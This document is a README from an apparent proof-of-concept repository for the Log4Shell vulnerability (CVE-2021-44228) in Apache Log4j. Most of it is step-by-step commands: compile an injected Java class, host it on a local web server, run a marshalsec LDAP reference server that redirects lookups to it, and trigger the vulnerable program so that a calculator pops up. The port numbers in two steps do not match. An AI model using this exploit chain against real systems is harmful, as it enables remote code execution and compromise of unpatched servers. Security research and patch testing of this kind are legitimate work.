lonecloud/CVE-2021-44228-Apache-Log4j

CVE-2021-44228-Apache-Log4j

CVE-2021-44228(Apache Log4j Remote Code Execution）

Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0

Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)

Usage:

1. 下载该项目，编译InjectClazz.java

# download
git clone http://github.com/lonecloud/CVE-2021-44228-Apache-Log4j
cd CVE-2021-44228-Apache-Log4j
javac InjectClazz.java

2. 在InjectClazz所在目录下启动web服务器

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
# 

3. 下载LDAP 服务器

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8088/#InjectClazz" 1389

4. 运行项目

cd CCVE-2021-44228-Apache-Log4j
mvn clean package
java -cp target/CVE-2021-44228-Apache-Log4j-1.0-SNAPSHOT-all.jar Log4jAceMain


# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8088/InjectClazz.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /InjectClazz.class HTTP/1.1" 200 -